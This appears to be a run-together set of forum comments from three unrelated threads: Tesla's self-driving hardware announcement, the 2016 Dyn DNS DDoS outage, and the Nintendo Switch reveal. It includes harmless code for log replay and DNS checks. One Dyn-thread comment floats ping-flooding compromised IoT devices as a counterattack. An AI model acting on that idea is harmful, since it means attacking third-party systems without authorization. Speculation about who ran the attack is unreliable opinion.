So many "but what if this and that and this..." & "and yeah let's see if it can handle X & Y"

This is the iPhone 1 of self-driving cars! That's akin to saying Apple should have waited to release their phone until the iPhone 7 "because of this & that & this..."

Don't we have to start somewhere?? Isn't there supposed to be a big user base here that understands it's an evolutionary process - we build the plane before we build the rocket before we shoot people into space?

Obviously the perfect self-driving car is still some way off, but I for one am thrilled this race is on!

I think what people are missing here is an understanding of how these systems are tested and deployed at scale. While I have no involvement with Tesla I do have first-hand knowledge of similar programs at tier 1 automotive suppliers.

The suppliers provide (or are looking to provide) an electronics suite to car manufacturers. The car manufacturers want the system to be safe lest they be sued out of existence. One part of that will include contractual requirements for the system to have clocked n-kilometers on the highway in full (or partial) operation. For example, one project had a requirement for car(s) with full sensor data recording and partial automation enabled for 1 million kms.

The automotive suppliers will outfit a handful of, say, 2019 model year test cars with the proposed sensors in the correct places and drive them around roads and highways in the specified conditions. Outfitting the cars can be expensive with prototype hardware, collecting the resulting data is a pain, and as a result the suppliers I'm familiar with run a (relatively) small number of cars for a lot of miles to record all that data.

The point of all this is to collect sensor data for resimulation as models are developed and trained. If an exceptional event occurs, they can modify the driving model, then "replay" the new model against all prior collected data to make sure the change doesn't do something unexpected elsewhere.
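
To make the replay idea concrete, here is a minimal sketch (hypothetical file layout and model interface, not any supplier's actual tooling) of regression-testing a candidate driving model by running every logged frame through both the current and the candidate model and flagging frames where their decisions diverge:

    import json
    from pathlib import Path

    def load_frames(log_dir):
        """Yield recorded sensor frames, assumed stored one JSON object per line."""
        for log_file in sorted(Path(log_dir).glob("*.jsonl")):
            with log_file.open() as f:
                for line in f:
                    yield json.loads(line)

    def resimulate(log_dir, current_model, candidate_model, steering_tolerance=0.1):
        """Replay all recorded frames and report where the candidate model diverges."""
        divergences = []
        for i, frame in enumerate(load_frames(log_dir)):
            old = current_model(frame)
            new = candidate_model(frame)
            # Compare the commanded outputs of the two models on identical inputs.
            if (abs(old["steering"] - new["steering"]) > steering_tolerance
                    or old["brake"] != new["brake"]):
                divergences.append((i, old, new))
        return divergences

    if __name__ == "__main__":
        # Toy stand-ins for the real perception/planning stack.
        current = lambda f: {"steering": -0.5 * f.get("lane_offset", 0.0), "brake": False}
        candidate = lambda f: {"steering": -0.6 * f.get("lane_offset", 0.0), "brake": False}
        for idx, old, new in resimulate("./sensor_logs", current, candidate):
            print(f"frame {idx}: {old} -> {new}")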

This process takes a lot of time (years) to pursue in this manner. What Tesla is doing is deploying the hardware in the field, then using the deployed systems to collect data to be used for the development of the automation platform. Instead of a couple of test mules they can use every single car they sell and let you drive it around for them while they record the results. Data collection that would take years can happen in weeks. This is a brilliant shortcut to the process and it puts them a couple years in front of the competition.

More cameras. Better sonars (very short range). Better radar processing, but apparently the same old single radar at bumper height. Still no windshield-height radar. No radar scanning in elevation. No LIDAR.

Now they just have to write software smart enough to not plow into stationary vehicles on the shoulder. There are videos of three separate Tesla crashes where the Tesla plowed into a vehicle partially blocking a lane.

There have been several announcements of low-cost solid-state LIDAR units for automotive. Quanergy announced last year, but didn't ship.[1] Innoviz announced this year to ship in 2018.[2] Advanced Scientific Concepts can't get their costs down.[3] (They have a great unit that costs $100K; the Dragon spacecraft uses it during docking.) Those are all-solid-state devices. There are also some companies trying to use MEMS mirrors, like TV projectors. Eventually somebody will get 3D LIDAR technology working at a low price point, but it hasn't happened yet.

If you go to the order page of the Model S, it says for the "Full Self-Driving Hardware":

>Please note also that using a self-driving Tesla for car sharing and ride hailing for friends and family is fine, but doing so for revenue purposes will only be permissible on the Tesla Network, details of which will be released next year.

For a time, new Tesla buyers again become early adopters. But unlike traditional early adopters, who take a trade-off (on price, or features, or polish) for being first, these adopters are promised the features when they are ready.

The nay-saying around Tesla is immense, even in these early HN comments. Obviously there's some risk here, but man. Tesla is sowing the seeds of the future.

1. It is a self driving car, it is so clearly the future, I wish it existed now, it is going to be awesome (in my opinion).

2. Despite knowing about and following news about driverless cars for a while, there was something surprisingly (to me) compelling about watching the video. It's like you get a little taste of the full A to B that it can give you (door to door).

Who wants to speculate how long it will be until self-driving cars are commonplace in the UK? I need to know how long I have to save!

From 00:50 to 01:10, why is the car driving in the left lane, when the right lane is clearly not turning? It's strange to see this behaviour as someone living in Germany, where you are supposed to drive in the right lane by default unless you are overtaking another car or there is a traffic jam...

EDIT: Also, did it turn into the wrong lane at 2:25-2:30? Is this a security risk?

> Teslas with new hardware will temporarily lack certain features currently available on Teslas with first-generation Autopilot hardware, including some standard safety features such as automatic emergency braking, collision warning, lane holding and active cruise control.

Not sure what to make of this. New buyers are getting less than current owners now, but expected to get much more later?

I can't think of a precedent for this as a marketing approach in modern consumer products.

Truly impressive. I wonder if the Model 3 will also be fitted out with all the sensors and cameras. If yes, I'll definitely get one.

As a German citizen, it really bugs me that Volkswagen is incapable of this kind of innovation. I don't see their roadmap playing out the way they plan, because Tesla might beat them to market hard. I fear German regulation will jump in (again) to help them against Tesla.

Currently, the German government gives out electric vehicle subsidies (~5k per car), but the program is limited to cars costing less than 60k. At the moment there is very low demand for this subsidy, because everyone who goes EV wants to go Tesla.

But seriously, the tech is very impressive. The journey was rather simple, though, and didn't cover more difficult areas (inner city driving, heavy stop-start traffic, roadblocks, road accidents and so on). I hope that Tesla tests these things thoroughly, because they've already got one death under their belt; it won't take many more to put people off completely.

How sure are they that this hardware revision is going to be what is required? I feel like at any point in time you can make an assumption about the hardware requirements, only to discover later that you could have actually done it with just a software update if the CPU had one more core. They'd have to be pretty sure this HW rev will meet their future demands for self-driving, right?

I get that tech companies want self-driving cars really bad because they smell billions of dollars in "disruption" but no matter how good AI gets, I have a suspicion it won't actually do better than a decent human driver can do. It's not about processing speed, it's about experience and reflexes, which granted, not everyone has.

Let's see a self-driving car win a Formula 1 race--and even that controlled racetrack environment isn't the same as the real world! It's actually harder to drive on the typical American roadways than it is to be on a track.

And yes, I am aware that AI stuff is improving exponentially or whatever, but the more I think about this, the more I think it is mostly a pipe dream to grab headlines and be a "look over here" type distraction for the purposes of raising funding.

In terms of safety, people will still lose their lives, they will just die from different kinds of car accidents than the kinds we have now.

The former head of Google's self-driving car project has said that self-driving cars are decades into the future.* Even if that's too pessimistic, nobody today knows what a self-driving car will look like, what kind of algorithms it will run, and what kind of sensors it will need to get there. I'm afraid this pronouncement is another sign that Mr. Musk is taking his investors for a ride.

From the car purchase page, it seems that they are charging an additional $13,200 (combining the addons Enhanced Autopilot and Full Self Driving capability at $7,900 and $5,300 respectively) for the full experience:

The video was too edited for me to have confidence. There was a moment at about 2:05 where I was interested to see how it handled the termination and merging of the lane -- but then we cut away before that happened. Or at 1:30 when there's no big sign post in the median, and then switching to left-rear camera, there we pass one. It's a nice narrative on the future, but it's far from proof of comprehensive functionality.

So what do these cars do when they hit a puddle of mud and it covers all the cameras? Will there be a new form of vandalism where someone puts scotch tape over/destroys the vehicle's cameras, and now your fancy autonomous vehicle is rendered incapacitated? Maybe this seems unlikely or ridiculous, but the dependence on cameras at points on the car that seem likely to get dirty and or damaged seems to be a risk to me.

I had hoped to see this technology occur in my lifetime; I said to myself "I hope I live to see the day" a few years ago. Here it is in 2016. Obviously it's just a highly controlled demo, but it has connected the dots. I'm confident the technology is there and the hardest work will be overcoming legislation and politics.

But does anyone else find this bittersweet?

I had an awesome moment of pride for what Tesla and Elon have done here. The dream is now reality.

All German car manufacturers are now fitting their cars with hidden passive sensors for collecting data related to human driving, with the intent to use these data for autonomous driving. Their main problem is the cost of transmission, i.e. they are considering buying mobile networks/towers and piggybacking on mobile traffic. These data are then obviously fed to huge datacenters, with a projected flow of up to 2 MB/s from a single car.

It was already announced before that the hardware is included, and it was clear that it is meant to be used for autonomous driving. And as they do not have autonomous driving yet, this is indeed just hot air... How would they know it is complete if there is no demonstration of it actually working?

I was thinking of this idea the other day when I came to an intersection where a stop sign had been hit. It was now bent so that it faced the highway traffic that did not have to stop. I was on a highway with no stop signs or lights for miles. What would the self-driving car do in that situation? For both sides of the intersection.

Then I thought about another intersection by my old house. For years the cross street had to stop for traffic on the main street. One day I went to work, then I came home and it was all of a sudden a 4-way stop. No database of stop signs could work either, unless it was updated to the minute.

So, both Nvidia and Tesla are working on self-driving cars based on the sensory data mainly from cameras mounted on the car, which are then run through X number of RNNs to generate models to operate on? While Google pursues their LIDAR-approach?

What other players are operating in this space? And what's their approach?

> To make sense of all of this data, a new onboard computer with more than 40 times the computing power of the previous generation runs the new Tesla-developed neural net for vision, sonar and radar processing software.

40 times the performance of a Tegra 3 is not particularly impressive.

Also, I sincerely hope that this new faster computer doesn't also run a web browser.

To be safely aware of its surroundings, an autonomous vehicle must have two types of sensors in each direction - this setup is not safe enough.

I would also require proof of 10 million kilometers of simulated rides with no accident, and a third-party organization not under the control of Tesla that creates some really tough repeatable challenges, both simulated and in the real world, that a vehicle manufacturer has to pass.

Challenges should include:

- thin wire tensioned over the street.

- the combination of super heavy rain with lightning, thick fog and people suddenly running onto the street

- passing by a soccer field when a ball bounces onto the street. Car should stop because it can be reasonably expected that a child will run blindly onto the street after the ball

- have obstacles that minimally invade into the minimum clearance outline of the current planned course. Car should plot an alternative course if it is possible or stop. Obstacles should appear in the last moment possible and car should always do the right thing.

- proof that the car can always detect street boundaries, any obstacle, and especially humans. It should be 100% correct or err on the safe side every time. At night, in a rain storm with super thick smog and hail. I'm not joking.

These are the minimum limits before any self-driving car should be able to drive on public roads, imho.

Will this new neural net and hardware be capable of advanced object detection?

For instance if a plastic bag or piece of cardboard rolls across the highway a human driver knows it's safe to run over without stopping. Would a system like this just see an obstacle via radar and emergency brake?

Google has been working on this problem for longer, and they have access to the largest image/video datasets in the world to train their models. I wonder how Google's and Tesla's systems would compare.

It is quite impressive, but I'll honestly have a hard time getting excited about self-driving cars until I see a demo of driving at night in a snow storm (heck, even heavy rain would be nice to see) around road construction, poor signage and faint lines on the road. Believe it or not, those kinds of conditions are fairly common in places outside of California, and until we have self-driving cars that can do really well in those conditions, this is basically just a fun demo in my opinion.

I'm really not trying to downplay the hard work and technical merit of Tesla; sped-up video and opportune edits aside, it is very cool. But I can't help but feel that it's a bit like showing off (to the world) your shiny new web app that only works in IE with ActiveX installed, only if your name is "demo user", and only when the planets are in perfect alignment - or in other words, a functional prototype by anyone else's standards. It's a great achievement, but we're certainly not "there" yet - if that's what it's trying to communicate. And yes, the "Full Self-Driving Hardware" headline certainly seems to suggest that (at least) the hardware is "there" now, and that it's only a matter of software iteration to be done.

Before you respond with the typical "but those are just nitpicky details" or "this is only v1; v2 will be able to solve those things easily", let me say this: going from this to a system that can handle challenging road conditions is not just a matter of software iteration. Since poor road conditions threaten the reliability of sensor data itself, we're talking about a problem that gets increasingly more difficult. The most sophisticated software in the world can't do anything if cameras and sensors are frozen or obstructed, and when signage and lines are lacking, the software must rely on more and more human-like levels of AI inference - not just about driving, but about the complex world in general.

This is a sign of the utter commodification of hardware and the possibility that a majority of innovation in the future (with the exception of low-power wearables) lies in the realm of software and algorithms.

When this becomes real, the next question becomes "why own the car"? What's the benefit of having it sit in a parking lot for 8 hours until I'm ready to go home. Seems like the future will become more Uber-like, where I call up rides whenever I want, and don't worry about parking, maintenance, etc....

About self-driving cars in general: I am very concerned that self-driving cars and speed limits are going to be a very annoying issue. I can see them driving way too slow in semi-complicated situations, annoying all other drivers. There are also many places in the country where it's normal and seemingly expected to go 5-10 mph over the speed limit. Of course self-driving cars will stay under the posted speed limit. I hope that in the long run we will be able to innovate on how we deal with speed limits, especially once human-driven cars are off the road and hopefully illegal. But till then I can see lots of road rage coming from this.

Teslas with new hardware will temporarily lack certain features currently available on Teslas with first-generation Autopilot hardware, including some standard safety features such as automatic emergency braking, collision warning, lane holding and active cruise control

Right, so they are actually announcing that their new cars now have less automation capability. I can't keep track of all the "autopilot" hardware they have deployed to date: Mobileye, Bosch radar, their own software hacks, and now this completely new one...

Not to mention that they have sold thousands of cars with the same Autopilot brand and "fully autonomous soon" messaging that will now likely never get there.

Seems like Tesla is moving forward without much regard for safety or technical advancement. Disappointed that the Tesla couldn't back up and park in one motion. It also went too far forward before backing up; you don't need that much room. How is it going to handle itself on Market St when it finds a spot but the bus behind it has to go around?

BUT the car was driving itself in ideal conditions, with high visibility in all directions and amidst light traffic.

What I'm really hoping to see is a video of the car driving itself in more dangerous situations, such as in the middle of heavy rain or thick fog that limits visibility, or at night on a dangerous stretch of highway with lots of trailer trucks zooming by, or surrounded by tired angry drivers on a major holiday in a popular route with bumper-to-bumper traffic.

When self-driving cars can successfully navigate those and other similarly dangerous scenarios, we will know the technology is ready.

Hardware performance is not a problem for Level 5 autonomy - the software is. If Tesla insists on deploying full self-driving capability in the next couple of years, they will be litigated out of existence. We are a few decades away from an autopilot that "understands" what it is doing. Right now it is just parroting the most common scenarios. This may be as good as or slightly better than the average driver, but it will still result in many deaths if deployed in hundreds of thousands of cars. Unless Tesla somehow shields itself from legal liability, it will be sued to oblivion.

So self-driving will be a standard feature of Model 3, not an option? Pretty cool if they can make it work. I'm skeptical that the computer (NVIDIA Drive PX 2 perhaps?) will have enough power to do it all without LIDAR.

> While this is occurring, Teslas with new hardware will temporarily lack certain features currently available on Teslas with first-generation Autopilot hardware, including some standard safety features such as automatic emergency braking, collision warning, lane holding and active cruise control.

This is very awesome and just one more step toward a completely automated world. Everyone's daily commute is a gold mine of mostly unused data points. There are solutions out there right now, like Waze / Google Maps, that'll redirect users around accidents. Can you imagine how crazy it'll be when our roads become even smarter based on individual users? For example, if people who enjoy driving faster are "logged in" to a road, a self-aware driving car could choose lanes that avoid those more dangerous users.

The Jalopnik review of the video was pretty critical, essentially claiming that the test was done under the best possible conditions and this doesn't demonstrate that Tesla is getting any closer to automatic driving on more typical roads. (I don't know whether that's right or wrong, just thought it was an interesting analysis.)

They have a pretty interesting description of their radar images: "...because of how strange the world looks in radar. Photons of that wavelength travel easily through fog, dust, rain and snow, but anything metallic looks like a mirror. The radar can see people, but they appear partially translucent. Something made of wood or painted plastic, though opaque to a person, is almost as transparent as glass to radar".

So my question is, where can I find such images? Or can I buy such a radar and tinker with it myself? What wavelength are they speaking about?

I wonder how they balance their development process for the algorithms with the upgraded sensors vs the code that runs with older sensors as input. Do they maintain two different teams? Back port improvements?

1) If a self-driving car is involved in an accidental death, is the justice system equipped to effectively hold a trial where information like logs, debugging information, etc. is discussed in court to validate whether or not there is any liability on the part of the manufacturer, considering the car is driving itself?

2) What happens in the case of bugs or system-level crashes? What is it about car software that makes it "not broken" compared to the other software we write?

Can someone compare Tesla's approach of collecting real-world data with Google's approach of "simulating" roads and conditions and running self-driving models on that (so, technically, their vehicles drive millions of miles on simulated roads)?

Intuitively Tesla's approach makes more sense, but I would love to hear from someone with domain knowledge on how much of a difference it can actually make (after all, you need quality training data, and Tesla may now have to navigate through significantly more noise).

I wonder, do they upload all the camera video taken during driving, as grayscale low-res video over 4G, to be run through their neural net at Tesla? What hardware do they have in the car to process the video? The Jetson TX1 can use up to 6 cameras or 1400 Mpix/s, but they probably use low-res output for neural net usage. I wonder what drivers think of their privacy.

"The person in the driver seat is only there for legal reasons" - how do Tesla reconcile this with the "summon" feature? How can they market the summon feature and say the Tesla could find you on the other side of the country unless it has someone in the driving seat touching the steering wheel?

Another reason we want better battery life on phones. I can imagine a scenario when your car goes and parks itself and you come looking for it without phone battery. Super cool though. Love how they are challenging such a significant and resourced industry.

I'm curious to see when cities will start changing their zoning for this new reality. The most exciting to me is elimination of parking minimums - these add a lot to the cost of building anything and take up very valuable/well located space.

Who's providing all this hardware? EIGHT surround cameras and TWELVE ultrasonic sensors: Are they building this in house too? If not, that's a lot of business to a supplier... all I could find about camera suppliers for Tesla was their former camera (tech?) supplier Mobileye.

My stance is very simple: when I can buy a car in Vancouver, BC without a driver's license, I will be at the showroom door / preorder page / whatever, midnight movie release style, to buy one, and I won't ask about the price. Just make it happen, please.

Some of what they describe sounds like it's going to take some real adjustment before it stops being annoying and starts being useful, namely the assumption of what you want when you get in and out.

> If you don't say anything, the car will look at your calendar and take you there as the assumed destination or just home if nothing is on the calendar.

Oh boy. If you get in your car, it will just assume it should start driving somewhere more or less immediately? What if you want to sit for a few minutes?

I know, I'm taking them very literally. Just saying, though.

> When you arrive at your destination, simply step out at the entrance and your car will enter park seek mode, automatically search for a spot and park itself.

Again, what if I'm unpacking things from the car, or don't want the car to go anywhere? I don't want to have to pull out my phone and tap on something to stop it rolling away, or jump in front of it or something, or open a door.

Is this a formal model-year revision/refresh, or just a midyear 'minor revision' thing (despite being a major revision?) Are old models retrofittable? Will this hurt the resale value of existing Teslas that have the last generation hardware?

Is there an industry-standard (or governmental) safety test that these autonomous systems have to go through to evaluate their efficacy and performance in different scenarios?

>While this is occurring, Teslas with new hardware will temporarily lack certain features currently available on Teslas with first-generation Autopilot hardware, including some standard safety features such as automatic emergency braking, collision warning, lane holding and active cruise control.

But not the software, and they don't even have confidence in their current implementation?

It's not surprising considering the recent announcements by the regulators, but that's quite a step.

Are the cars going to look like Google's and Uber's self driving cars, then?

I never cared that much about self driving capabilities - I like to drive myself - and I certainly don't want to shell out $35,000 for a car with what looks like a food processor or a police emergency light mounted on the rooftop.

IMHO, one of the best features of Tesla has been that they actually made EVs look like traditional cars. It might seem trivial, but many of the budding competitors still fail to do just that:

Out of curiosity, why do caching DNS resolvers, such as the DNS resolver I run on my home network, not provide an option to retain last-known-good resolutions beyond the authority-provided time to live? In such a configuration, after the TTL expiration, the resolver would attempt to refresh from the authority/upstream provider, but if that attempt fails, the response would be a more graceful failure of returning a last-known-good resolution (perhaps with a flag). This behavior would continue until an administrator-specified and potentially quite generous maximum TTL expires, after which nodes would finally see resolution failing outright.

Ideally, then, the local resolvers of the nodes and/or the UIs of applications could detect the last-known-good flag on resolution and present a UI to users ("DNS authority for this domain is unresponsive; you are visiting a last-known-good IP provided by a resolution from 8 hours ago."). But that would be a nicety, and not strictly necessary.

Is there a spectacular downside to doing so? Since the last-known-good resolution would only be used if a TTL-specified refresh failed, I don't see much downside.
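
For what it's worth, the logic described above is small; here is a minimal sketch using only the Python standard library (the cache policy and the TTL numbers are illustrative, not how any particular resolver actually behaves):

    import socket
    import time

    # last-known-good cache: hostname -> (address, time it was last refreshed)
    _cache = {}

    REFRESH_TTL = 300            # stand-in for the authority-provided TTL
    LAST_KNOWN_GOOD_TTL = 86400  # generous, administrator-specified maximum

    def resolve(host):
        """Return (address, is_stale); serve stale data only when a fresh lookup fails."""
        now = time.time()
        cached = _cache.get(host)
        if cached and now - cached[1] < REFRESH_TTL:
            return cached[0], False
        try:
            addr = socket.gethostbyname(host)  # attempt the upstream refresh
            _cache[host] = (addr, now)
            return addr, False
        except OSError:
            # Upstream failed: fall back to last-known-good, flagged as stale.
            if cached and now - cached[1] < LAST_KNOWN_GOOD_TTL:
                return cached[0], True
            raise  # no usable answer at all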

I wanted to provide an update on the PagerDuty service. At this time we have been able to restore the service by migrating to our secondary DNS provider. If you are still experiencing issues reaching any pagerduty.com addresses, please flush your DNS cache. This should restore your access to the service. We are actively monitoring our service and are working to resolve any outstanding issues. We sincerely apologize for the inconvenience and thank our customers for their support and patience. Real-time updates on all incidents can be found on our status page and on Twitter at @pagerdutyops and @pagerduty. In case of outages with our regular communications channels, we will update you via email directly.

In addition you can reach out to our customer support team at support@pagerduty.com or +1 (844) 700-3889.

I'm a GitHub employee and want to let everyone know we're aware of the problems this incident is causing and are actively working to mitigate the impact.

"A global event is affecting an upstream DNS provider. GitHub services may be intermittently available at this time." is the content from our latest status update on Twitter (https://twitter.com/githubstatus/status/789452827269664769). Reposted here since some people are having problems resolving Twitter domains as well.

Name Server: ns1.p44.dynect.net
Name Server: ns2.p44.dynect.net
Name Server: ns3.p44.dynect.net
Name Server: ns4.p44.dynect.net
Name Server: sdns3.ultradns.biz
Name Server: sdns3.ultradns.com
Name Server: sdns3.ultradns.net
Name Server: sdns3.ultradns.org

ultradns.biz:

Name Server: PDNS196.ULTRADNS.ORG
Name Server: ARI.ALPHA.ARIDNS.NET.AU
Name Server: ARI.BETA.ARIDNS.NET.AU
Name Server: ARI.GAMMA.ARIDNS.NET.AU
Name Server: ARI.DELTA.ARIDNS.NET.AU
Name Server: PDNS196.ULTRADNS.NET
Name Server: PDNS196.ULTRADNS.COM
Name Server: PDNS196.ULTRADNS.BIZ
Name Server: PDNS196.ULTRADNS.INFO
Name Server: PDNS196.ULTRADNS.CO.UK

Journalist and security researcher Brian Krebs believes this is someone doing a DDoS as payback for research into questionable "DDoS mitigation services" that he and Dyn's Doug Madory did. Doug just presented his results yesterday at NANOG and Krebs believes this is payback. Read more: https://krebsonsecurity.com/2016/10/ddos-on-dyn-impacts-twit...

I'm wondering, from a regulatory perspective, what might be done to mitigate DDoS attacks in the future?

From comments made on this and other similar posts in the past, I've gathered the following:

1) Malicious traffic often uses a spoofed IP address, which is detectable by ISPs. What if ISPs were not allowed to forward such traffic?

2) There is no way for a service to exert back pressure. What if there was? e.g. send a response indicating the request was malicious (or simply unwanted due to current traffic levels), and a router along the way would refuse to send follow up requests for some time. There is HTTP status code 429, but that is entirely dependent on a well-behaved client. I'm talking about something at the packet level, enforced by every hop along the way.

3) I believe it is suspected that a substantial portion of the traffic is from compromised IoT devices. What if IoT devices were required to continually pass some sort of a health check to make other HTTP requests? This could be enforced at the hardware/firmware level (much harder to change with malware), and, say, send a signature of the currently running binary (or binaries) to a remote server which gave the thumbs up/down.

"digikey.com", the big electronic part distributor, is currently inaccessible. DNS lookups are failing with SERVFAIL. Even the Google DNS server (8.8.8.8) can't resolve that domain. Their DNS servers are "ns1.p10.dynect.net" through "ns4.p10.dynect.net", so it's a Dyn problem.

This will cause supply-chain disruption for manufacturers using DigiKey for just-in-time supply.

I've been singing the praises of AWS Route 53 for a long time; they stay up and running. I can't believe major multi-million dollar companies (Twitter, GitHub, Soundcloud, Pagerduty) would not run a mix of multiple DNS providers.

Also, what is happening is a cascade effect, where a 3rd party being down affects others.

Is it time for everyone to actually start using secondary name servers/DNS resolvers too from a different provider from primary? DNS _is_ built for this, for the very purpose of handling failure of the primary resolver, isn't it? Just most people don't seem to do it -- including major players?

Seems to be impacting POPs in US East most severely. We use RIPE Atlas to assess the impact of DNS outages, and in the past hour we have measured about 50-60% recursive query failure from a few hundred probes in that region: https://cloudharmony.com/status-for-dyn

Any quick script to see if a given domain ultimately resolves to them? My SaaS company has a lot of custom domains from whatever DNS servers pointed at us and I'd like to be able to tell people whether it's our fault or not.
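
Not authoritative, but here is a quick sketch of such a check (it assumes the dnspython package, version 2.0 or later, and only inspects the delegated NS names, so it will miss domains that merely alias through a Dyn-hosted host):

    import sys
    import dns.resolver  # pip install dnspython (>= 2.0)

    DYN_SUFFIXES = ("dynect.net", "dyn.com")

    def uses_dyn(domain):
        """Return True if any of the domain's nameservers look like Dyn."""
        answers = dns.resolver.resolve(domain, "NS")
        nameservers = [str(rr).rstrip(".").lower() for rr in answers]
        return any(ns.endswith(DYN_SUFFIXES) for ns in nameservers)

    if __name__ == "__main__":
        for domain in sys.argv[1:]:
            try:
                print(domain, "-> Dyn" if uses_dyn(domain) else "-> not Dyn")
            except Exception as e:
                print(domain, f"-> lookup failed ({e})")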

Let's assume that foreign countries such as Russia or China were trying to sabotage our elections on the night of Nov 8th. What severe economic and political backlash would we have to deal with if we cut off the traffic coming in from those regions (not in a "we control the internet" kind of way)? I am sure they already have nodes operating within the USA. A lot of major tech companies use CDNs that can still serve traffic globally to the consumers of those countries. Even better, how about we regulate and slow down all incoming traffic for, say, half a day on election day? Is it even possible?

In (well, after) attacks like this, and really any other massive DDOS, shouldn't it be possible to identify potential botnets and try to take them out (notify their owners that they're being used, notify their hosting providers, etc) so that they can't be used again in the future?

Quick question for you all. Just two days ago I registered two domain names at Dynu (not Dyn). Early this morning I got a cold call from a company in India who knew the domain names and my phone number and was calling to ask if I wanted them to help me manage my website cheaply. Also, this morning I got a spam text from someone who claimed to be GoDaddy offering the same thing. Now, I protect my number really well, so this is the first time in 5+ years that I ever got spam texts or calls to my number. Do you think Dynu was also hacked?! Or maybe Dynu sells client numbers (which is how the guy in India claimed to get my number) and it was just by random chance that this happened at the same time as the Dyn hack.

I've been having the same problem accessing github in particular. Just for fun, I opened the Opera browser and activated the built-in VPN. That got everything going again. At least for browsing, not so useful for my git pulls and pushes.

Can someone explain why this is so bad? I think the internet handled the downtime of Dyn pretty well; not reaching GitHub wasn't exactly pleasing, but I added the IP temporarily to /etc/hosts and the problem was solved. Isn't the best strategy to accept that attacks will continue and systems may go down, and design for resilience? If so, this attack can serve as a warning and as a check that we can handle these types of attacks. I am exaggerating a bit, but I would imagine that constant attacks keep the internet resilient and healthy. An unchallenged internet may be the greater risk.

The DDoS problems, at least those not related to spoofing IPs, could be curtailed if we provide a strong incentive to the ISPs to work on it.

Let's hold the ISPs financially liable for the harmful traffic that comes from their network. If a client reports a harmful IP to the ISP, every bit of subsequent traffic sent from that IP to this client carries a penalty.

Yeah, I know, routing tables are small, yada yada. If we put thumbscrews to the ISPs they will find a way to block a few thousand IPs of the typical botnet, even if it requires buying new switches from Cisco & co.

Anyone know any details of what the attack looks like? I had a quick look in my (albeit small) network for odd flows going to their AS 33517, but didn't see much that looked odd at first glance...

While my app isn't resolved using Dyn, we are relying on APIs on our EC2 backend that use their DNS. Is there a Linux DNS caching server that will serve from a local cache primarily, and do lookups in the background instead to update the local cache? During the period Dyn was down, it would've continued serving from the local cache and retried the background lookups, keeping my app up. I can also see it improving performance, as my servers currently do lookups to the EC2 DNS on each HTTP request...
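
Assuming Unbound is an option, roughly this behaviour can be sketched with its prefetch and serve-expired settings (availability and exact semantics depend on the Unbound version, so treat this as a starting point rather than a recipe):

    server:
        # refresh popular records shortly before their TTL expires,
        # so most lookups are answered from the local cache
        prefetch: yes
        # allow answering from cache with expired records while a refresh is attempted
        serve-expired: yes
        serve-expired-ttl: 86400   # limit (seconds) on how long past expiry a record may be served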

No idea if this would work, but could people theoretically just ping flood the IOT devices involved to mitigate the attack?

They run some sort of web server, since most devices provide some web interface, so clearly there's a port open which could be hit if the IP is known, and with the shoddy security in these devices I'd wonder if their local (likely low-performance) hardware would be susceptible to something as simple as a ping flood attack.

How can I, a proficient web developer but one with little experience working directly with the underlying infrastructure, help in whatever effort is being made to thwart this and related attacks? I feel a moral obligation to help, as these attacks seem a grave threat to our economy and could cause unrest given the current political climate. Thanks.

https://cloudharmony.com/status-for-dyn is now (12:43pm EDT) showing Dyn's "US East" and "US West" centers as being down. Anyone know anything about this Cloudharmony service? How often does it update? and what is it monitoring?

Hmm... Seems to be quite widespread. Some of our Amazon AWS services (located in the US) that rely on SQS are reporting critical errors. Intercom.io is also down at present, which we use for support for our web apps. Not looking very good from here (in Australia).

Why does it always have to be a "Nation State"? I have been hanging out with 17-year-olds that knew far more about DNS configs than a room of "Cyber Security Professionals"; the professionals were clueless, and these kids could run circles around them.

USA cyber defenses are NOT up to the task of defending our critical electronic infrastructure. Letting every company that runs critical services decide their own security posture is not scalable and has left us vulnerable. While no one is getting hurt, we are taking cyber missile hits from our enemies and eventually the damage will be worse. Other countries with more central controls will be less vulnerable than we are to crippling infrastructure take downs.

It is so reassuring to see Nintendo create a modern gaming machine that doesn't try to be a living room hub or an iPad competitor. Going entirely by the video alone, every single design decision has been made with a clear focus on gaming. The simple docking action for transitioning it to the TV, the versatility and portability of the controllers, the reasonable size, etc all combine to make this (again, judging entirely from the video) a focused, confident release that finally embraces the changing way people play games.

Besides an original Gameboy (which I loved), I've never owned a Nintendo console. After seeing this trailer, it is an instant buy for me in March.

The only thing I want to know more about is the online store. From what I understand, Nintendo's eStore has a lot of shortcomings in a lot of weird areas. I hope they address those. I have an Xbox One and about 25 games, all of which were purchased digitally. I'm not sure I could go back to physical versions of games.

Very clever. Anchor for home, and again trying for the mobile area where their creativity really worked (3DS). I'll be curious about the system specs and the decisions they made - such as having that apparent card slot. Hooray for the headphone jack.

I'll never understand the marketing motivation to show a bunch of people getting together for a social gathering and togetherness, then cram together to watch / play on something with a screen the size of a hardback novel.

The most interesting thing to me is a design decision that combines an important aspect of the original NES with an important aspect of all of Nintendo's portable machines since the DS: a reduced barrier to entry for multiple people to play. In 1989, every NES sold came with two controllers out of the box. Similarly, every portable Nintendo system since the original DS has supported Download Play, which requires each player to have their own console, but only a single copy of a game.

It looks like you'll be able to use the standard Switch controller as two "half controllers." Sure, you get limited functionality, but one person with one standard (portable!) console and one multiplayer game like Mario Kart can say those all-important words to anyone, anytime: "Want to play?"

So this is a good usage model, but I'm not sure people want to carry yet another tablet just for gaming. The only way I can see this thing taking off is if it can fall back into an Android tablet mode for web browsing, e-mail, etc. But as a portable gaming console, it seems pretty boss. I'm curious what the hardware specs are and how they differ from other tablets on the market.

Because if it can't do everything else my current tablet can, I'm gonna have to carry a tablet AND this thing. Done right, Nintendo can make this thing the first real challenger to the iPad for mass-market adoption. But they've gotta treat it as a first-party Android device and get updates out ASAP and not muck with the interface too much. I'm willing to bet they could work out a rev-share agreement with Google on the Google Play store and Google Play Apps (and keeping their own Nintendo licensing scheme).

But let's not kid ourselves here: Nintendo is a Japanese company and it operates like one. That means they'll try to own the entire value chain and miss out on any network effects, while simultaneously moving themselves from a market with a 5-10 year refresh cycle to one with a 2-3 year refresh cycle. While it means they could sell more tablets to repeat customers, it also means that they have less time to be patient for success (as happened with the Wii and WiiU) since it also increases customer churn. Network effects and platform lock-in are a lot more important when the refresh cycle is shorter, because there are more opportunities for your customers to jump off the train.

I wish Nintendo luck, and I think that this is a good usage model. But I'm not convinced it's compelling enough to displace the tablets that people are already carrying around with them unless it can also duplicate the capability of those devices.

Nintendo has been trying to blend mobile and console gaming since the Gamecube (anyone else remember the GBA link??). I think they've finally succeeded in a way that can make the transition between the two seamless.

